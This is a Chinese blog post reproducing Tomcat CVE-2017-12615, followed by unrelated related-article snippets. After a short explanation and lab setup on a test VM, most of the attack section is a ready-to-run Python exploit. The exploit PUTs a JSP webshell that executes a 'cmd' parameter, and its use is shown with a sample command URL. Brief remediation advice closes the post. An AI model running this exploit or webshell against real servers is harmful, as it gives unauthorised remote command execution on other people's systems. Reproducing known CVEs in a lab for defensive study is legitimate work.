tomcat http status 400 – bad request_Tomcat-远程代码执行漏洞

最新推荐文章于 2024-06-28 16:11:10 发布
最新推荐文章于 2024-06-28 16:11:10 发布
阅读量414 收藏
点赞数
文章标签: tomcat http status 400 – bad request
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39967812/article/details/111358427
版权

漏洞原理

Tomcat的Servlet是在conf/web.xml配置的,通过配置文件可知,当后缀名为.jsp和.jspx的时候是通过JspServlet处理请求的,而其他的精通文件是通过DefaultServlet处理的可以得知:"1.jsp "(末尾有一个空格)并不能匹配到JspServlet,而是会交由DefaultServlet去处理当处理PUT请求时:会调用resources.bind:dirContext为FileDirContext:调用rebind创建文件又由于Windows不允许" "(空格)作为文件名结尾,所以会创建一个".jsp"文件,导致代码执行

漏洞环境

漏洞靶机 Win 2003x64 :192.168.136.136PC主机(Python环境) :192.168.1.103漏洞存在范围:Tomcat-7.0.0-Tomcat-7.0.81
4a7b044de1d6292f4e76c7ab28e8666a.png

环境搭建

win 2003x64 安装 Java环境Tomcat7.0.75下载:http://archive.apache.org/dist/tomcat/tomcat-7/v7.0.75/bin/apache-tomcat-7.0.75.exe
301bcd2cc0b9f1cbd428bfe3e8d2480c.png
56314b63ed7051cb83cb8e8529e388da.png

开启HTTP PUT

找到Tomcat的安装目录下的conf的web.xml

00210a0f23149fa58f5d44659a939f3e.png
afaf6242b8203262ad3a8f30ae4f4a6b.png 
readonly            Is this context "read only", so HTTPcommands like PUT and DELETE are rejected?  [true]   这个意思就是说:当前是只读模式,是不允许修改的

找到org.apache.catalina.servlets.DefaultServlet方法:

d89b7cf6b6b508ff23d60ab1b4db2563.png

添加如下代码并保存:

readonlyfalse
02250f9d805f35d0d30702e944e13c5a.png

修改完之后,重启Tomcat:

909a2cf0a3c82a6579b1ef5dd975e89e.png

漏洞复现

Python EXP:

#! -*- coding:utf-8 -*- import httplib import sys import time body = '''"+excuteCmd(request.getParameter("cmd"))+"
");}else{out.println("Test By Power_Liu");}%>''' try: conn = httplib.HTTPConnection(sys.argv[1]) conn.request(method='OPTIONS', url='/ffffzz') headers = dict(conn.getresponse().getheaders()) if 'allow' in headers and headers['allow'].find('PUT') > 0 : conn.close() conn = httplib.HTTPConnection(sys.argv[1]) url = "/" + str(int(time.time()))+'.jsp/' #url = "/" + str(int(time.time()))+'.jsp::$DATA' conn.request( method='PUT', url= url, body=body) res = conn.getresponse() if res.status == 201 : #print 'shell:', 'http://' + sys.argv[1] + url[:-7] print 'shell:', 'http://' + sys.argv[1] + url[:-1] elif res.status == 204 : print 'file exists' else: print 'error' conn.close() else: print 'Server not vulnerable' except Exception,e: print 'Error:', e

运行Python-EXP脚本:

python2 tomcat-CVE-2017-12615.py 192.168.136.136:8080得到的shell:http://192.168.136.136:8080/1574766773.jsp
d300a0c8e245449bb7c298dfc322e058.png

得到一枚Webshell:

773266fb1241a0cf478c70184a8338e2.png 
访问:http://192.168.136.136:8080/1574766773.jsp?pwd=hacker&cmd=ipconfig
c9e8f7e9f6e2f80f52d54cc9342dab4b.png

漏洞修复

将Tomcat更新到该漏洞被修复的版本(例如:Tomcat:8.5.23)readonlyinit-param不应该将false首先设置。如果该参数保留到默认(true),则攻击者无法上传文件。最后可以在前端安装WAF等防护软件来阻止PUT和DELETE请求。

weixin_39967812
关注
125,nginx+tomcat 配置https 出现400 Bad Request.问题 解决。
张震的博客
06-06 4179
简单介绍:1,nginz 1.4版本2,tomcat 9.0 版本3,证书由 letsencrypt 生成,免费的ov证书。问题描述:比如原来访问test.***.com/manage可以正常访问,配置https后浏览器直接输入test.***.com/manage 域名会自动变成http://test.haha.com:443/manage/  然后页面提示400 Bad Request,更神奇...
tomcat http status 400 bad request_Tomcat爆出高危漏洞
weixin_39657125的博客
12-15 836
作者:Hu3sky@360CERT原文链接:https://www.anquanke.com/post/id/199448#h2-00x01 漏洞背景2020年02月20日, 360CERT 监测发现 国家信息安全漏洞共享平台(CNVD) 收录了 CNVD-2020-10487 Apache Tomcat文件包含漏洞Tomcat是由Apache软件基金会属下Jakarta项目开发的Ser...
tomcat http status 400 bad request_刨根问底 HTTP 和 WebSocket 协议
weixin_39842029的博客
12-12 386
那天和boss聊天,不经意间提到了Meteor,然后聊到了WebSocket,然后就有了以下对话,不得不说,看问题的方式不同,看到的东西也会大不相同。A:Meteor是一个很新的开发框架,我觉得它设计得十分巧妙。B:怎么个巧妙之处?A:它的前后端全部使用JS,做到了真正的前后端统一;前端浏览器里存有一份后台开放出来的数据库的拷贝,快;使用WebSocket协议来做数据传输协议,来同步前后端的数据库...
解决HTTP 400 Bad Request错误的方法
最新发布
技术研究中心
06-28 2489
解决HTTP 400 Bad Request错误的方法 大家好,我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿! 在进行网络通信时,HTTP 400 Bad Request错误是相对常见的问题之一。这种错误通常指示客户端发送的请求无效或格式错误,导致服务器无法理解并处理请求。本文将深入探讨HTTP 400错误的原因、常见解决方法以及在Java编程中如何处理和预防这类错误。 HTTP 400 Bad Request错误的原因 1. 请求参数错误 参
status“: 400, “error“: “Bad Request“,
热门推荐
Ghjkku的博客
09-28 7万+
代码】“status“: 400, “error“: “Bad Request“,
JavaScript学习笔记(三十)——HTTPHTTPS
qq_45268602的博客
09-16 473
转载于:https://www.cnblogs.com/ok-lanyan/archive/2012/07/14/2591204.html HTTP HTTPS WebService HTTP是一个属于应用层的面向对象的协议,由于其简捷、快速的方式,适用于分布式超媒体信息系统。它于1990年提出,经过几年的使用与发展,得到不断地完善和扩展。目前在WWW中使用的是HTTP/1.0的第六版,HTTP/1.1的规范化工作正在进行之中,而且HTTP-NG(Next Generation of HTTP)的建议已经提
Nginx+tomcat配置https后出现400 Bad Request问题
sunlong12321的博客
11-29 1万+
因为任职公司的软件产品都是基于二维码的,必须使用微信扫码获取OPENID的形式展开业务,然后坑爹的TX发布通知12月底之前所有http协议的页面将无法访问,所以一狠心购买了一个通配符的SSL证书,在此简述下nginx+tomcat配置https的流程和我遇到的问题: 系统环境:Centos6.8 软件版本:nginx(1.12.1)   tomcat(7.0.78) nginx和tomcat
Java HTTP Status 400Bad Request问题解决
03-06
HTTP Status 400 - Bad Request表示客户端发送的请求有错误,服务器无法理解。下面是解决Java HTTP Status 400 - Bad Request问题的一些常见方法: 1. 检查请求参数:确保请求参数的格式正确,并且符合服务器的要求...
HTTP/1.1 400 Bad RequestTomcat
Andy's Blog
08-16 6367
HTTP/1.1 400 Bad Request 概览 400 Bad Request The server cannot or will not process the request due to an apparent client error (e.g., malformed request syntax, size too large, invalid request me...
springMVC跨服务器上传异常returned a response status of 400 Bad Request
jia5353111的博客
12-06 901
HTTP状态 500 - 内部服务器错误 类型 异常报告 消息 Request processing failed; nested exception is com.sun.jersey.api.client.UniformInterfaceException: PUT http://localhost:9090/uploads/8111065368e94c83a729f2738b73bfe8_管理推荐.png returned a response status of 400 Bad Request
远程访问tomcat管理页面
Echo的博客
12-12 558
代码远程访问tomcat管理页面。
tomcat系列】配置tomcat远程访问
Alan_beijing
03-12 4731
当程序部署在tomcat上后,需要监测tomcat的性能和监测tomcat的各项指标,如内存使用情况,cpu使用情况,jvm实际情况等,对于这些指标的监控,tomcat提供了访问入口,然而tomcat默认的访问只能在部署tomcat服务的服务器上访问,即不能在其他服务器上访问(禁止远程访问),为了解决远程访问,需要做一些配置,本文旨在解决该问题。 一 问题描述 如下页面,表示不能远程访问toc...
picACG本地缓存目录_前端必备 Nginx 负载均衡和缓存实践
weixin_39673704的博客
11-18 862
基础篇一、环境服务器版本:CentOS 7.2为了保证学习阶段不遇到奇怪的事情,请保证以下四点(大神选择性无视)确认系统网络确认yum可用确认关闭iptables确认停用selinux#查看iptables状态安装一些系统基本工具,正常情况系统都会自带(没有在装哦)installgccgcc-c++autoconfpcrepcre-develmakeautomake二、Ng...
400 Bad Request 报错的一种问题
mocangli的博客
02-24 935
本来在本地接口能用,但服务器突然接口就用不了了 一直报400Bad Request错误, 后台报错:Invalid character found in the request target. The valid characters are defined in RFC 7230 and RFC 3986 通过在网上终于找得一点头绪有可能就是 tomcat版本的问题。 以前版本老板说有漏洞...
【亲测】tomcat 请求url中带有特殊符号{} | 返回400的问题
月落星沉
11-29 2673
问题描述: 前台: HTTP Status 400 错误的请求 Type 异常报告 消息 Invalid character found in the request target. The valid characters are defined in RFC 7230 and RFC 3986 描述 由于被认为是客户端对错误(例如:畸形的请求语法、无效的请求信息帧或者虚拟的请求路...
本地调试正确,测试环境报400bad request)的问题
jesseXu的博客
10-14 1804
出现问题原因: 是因为新版本tomcat不支持特殊字符的原因。 完整url如下: http://localhost:8080/bspDataService/downloadExcel.action?requestParam={modelid='052a05aa-d833-4c6e-810f-58bc36787ace',project='%25E7%259F%25BF%25E7%25BE%258E%...
Tomcat HTTP Status 404 tomcat 404问题解决
m0_67400973的博客
04-27 1985
今天初次使用tomcat的时候,用浏览器访问总是不成功。经过一番周折总算成功了,虽然这个知识点不是很难,但还是写篇博客,希望能帮助那些初学者。(注:笔者用的是:tomcat 7) 前提:你的tomcat可以访问:http://localhost:8080/ 问题:当把项目发布到tomcat下并启动tomcat,可以访问8080端口,但是不能访问自己的页面。 请按照下面三个步骤一一来测试,相信你会得到你想要的结果。 一、查看自己的路径是否错误,正确的路径访问是:http://localhost:8080/xx
Tomcat服务器无法运行,出现Bad Request (Invalid Hostname)错误
写意人生的专栏
03-26 6892
问题可能是Tomcat服务器默认的8080端口已经被占用,可采用修改Tomcat服务器端口的方法来解决。如何修改端口号? 1.找到Tomcat目录下的conf文件夹 2.进入conf文件夹里面找到server.xml文件 3.打开server.xml文件 4.在server.xml文件里面查找涉及到“8080”port的部分,修改为新端口号,如8088,并保存。 5.重新启动Tomcat
Tomcat服务器与Http协议之请求(get请求、post请求)和响应
zhaiax672的博客
06-02 5261
发展历程1、最早的web服务器-NCSA(美国国家超级计算应用中心的缩写),由于主要开发者的离开,让其前景变得不明朗。所以一些开发者聚集在一起,对其进行了缺陷修复和增强代码,发布了新的版本Apache,即:“打补丁后的Web服务器(A Patchy Web Server)”。 2、Apache软件基金会(ASF),1999年成立。 主要职责: 1、通过供给 硬件、通信和商业基础设施的形式
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值